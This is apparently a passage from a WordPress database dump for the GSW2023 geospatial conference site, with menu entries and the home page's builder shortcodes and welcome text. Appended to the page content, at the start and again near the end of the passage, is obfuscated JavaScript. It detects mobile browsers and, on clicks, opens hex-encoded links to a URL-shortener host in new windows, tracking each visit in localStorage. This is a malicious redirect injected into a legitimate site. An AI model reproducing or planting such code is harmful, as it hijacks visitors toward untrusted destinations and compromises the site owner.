)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-06 22:01:03','2022-10-06 22:01:03','',2167,'https://gsw2023.com/?p=2345',0,'revision','',0),
(2346,1,'2023-09-16 22:41:11','2022-10-06 22:04:30','','ISPRS','','publish','closed','closed','','isprs','','','2023-09-16 22:41:11','2023-09-16 22:41:11','',0,'https://gsw2023.com/?p=2346',3,'nav_menu_item','',0),
(2348,1,'2023-09-16 22:41:11','2022-10-06 22:30:49','','The Geospatial Week','','publish','closed','closed','','the-geospatial-week','','','2023-09-16 22:41:11','2023-09-16 22:41:11','',0,'https://gsw2023.com/?p=2348',4,'nav_menu_item','',0),
(2349,1,'2023-09-16 22:41:11','2022-10-06 22:38:07','','AAST','','publish','closed','closed','','aast','','','2023-09-16 22:41:11','2023-09-16 22:41:11','',0,'https://gsw2023.com/?p=2349',5,'nav_menu_item','',0),
(2350,1,'2023-09-16 22:41:11','2022-10-06 23:03:11','','Gallery','','publish','closed','closed','','gallery','','','2023-09-16 22:41:11','2023-09-16 22:41:11','',0,'https://gsw2023.com/?p=2350',6,'nav_menu_item','',0),
(2351,1,'2023-09-16 22:41:11','2022-10-06 23:04:13','','Committees','','publish','closed','closed','','committees','','','2023-09-16 22:41:11','2023-09-16 22:41:11','',0,'https://gsw2023.com/?p=2351',8,'nav_menu_item','',0),
(2352,1,'2023-09-16 22:41:12','2022-10-06 23:07:48','','Program Overview','','publish','closed','closed','','program-detail','','','2023-09-16 22:41:12','2023-09-16 22:41:12','',0,'https://gsw2023.com/?p=2352',13,'nav_menu_item','',0),
(2353,1,'2023-09-16 22:41:12','2022-10-06 23:12:51','','Important Dates','','publish','closed','closed','','important-dates','','','2023-09-16 22:41:12','2023-09-16 22:41:12','',0,'https://gsw2023.com/?p=2353',21,'nav_menu_item','',0),
(2354,1,'2023-09-16 22:41:12','2022-10-06 23:16:16','','Register','','publish','closed','closed','','register','','','2023-09-16 22:41:12','2023-09-16 22:41:12','',0,'https://gsw2023.com/?p=2354',22,'nav_menu_item','',0),
(2355,1,'2023-09-16 22:41:12','2022-10-06 23:19:29','','Submit Abstracts/Papers','','publish','closed','closed','','submit','','','2023-09-16 22:41:12','2023-09-16 22:41:12','',0,'https://gsw2023.com/?p=2355',23,'nav_menu_item','',0),
(2356,1,'2023-09-16 22:41:12','2022-10-06 23:29:20','','Travel to Egypt','','publish','closed','closed','','travel-to-egypt','','','2023-09-16 22:41:12','2023-09-16 22:41:12','',0,'https://gsw2023.com/?p=2356',32,'nav_menu_item','',0),
(2357,1,'2023-09-16 22:41:12','2022-10-06 23:29:20','','GSW2023 Venue','','publish','closed','closed','','gsw2023-venue','','','2023-09-16 22:41:12','2023-09-16 22:41:12','',0,'https://gsw2023.com/?p=2357',33,'nav_menu_item','',0),
(2358,1,'2023-09-16 22:41:12','2022-10-06 23:29:20','','Accommodation','','publish','closed','closed','','accommodation','','','2023-09-16 22:41:12','2023-09-16 22:41:12','',0,'https://gsw2023.com/?p=2358',35,'nav_menu_item','',0);
INSERT INTO `dnctiavkr_posts` VALUES
(2359,1,'2023-09-16 22:41:12','2022-10-06 23:29:20','','Social Programme','','publish','closed','closed','','social-programme','','','2023-09-16 22:41:12','2023-09-16 22:41:12','',0,'https://gsw2023.com/?p=2359',34,'nav_menu_item','',0),
(2360,1,'2022-10-06 23:35:27','2022-10-06 23:35:27','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm.gsw2023.com%2Fpages%2Fregistration.html\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665131484276{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665123014762{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #3098E3), color-stop(54%, #6FA1D4), color-stop(81%, #488CBD), color-stop(95%, #3298CF));background: -moz-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -webkit-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -o-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -ms-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023 BY\" main_heading_color=\"#f27304\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_row_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"2325\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" title=\"AASTMT\" link=\"https://aast.edu/en/\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"2326\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" title=\"ISPRS\" link=\"https://www.isprs.org/\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 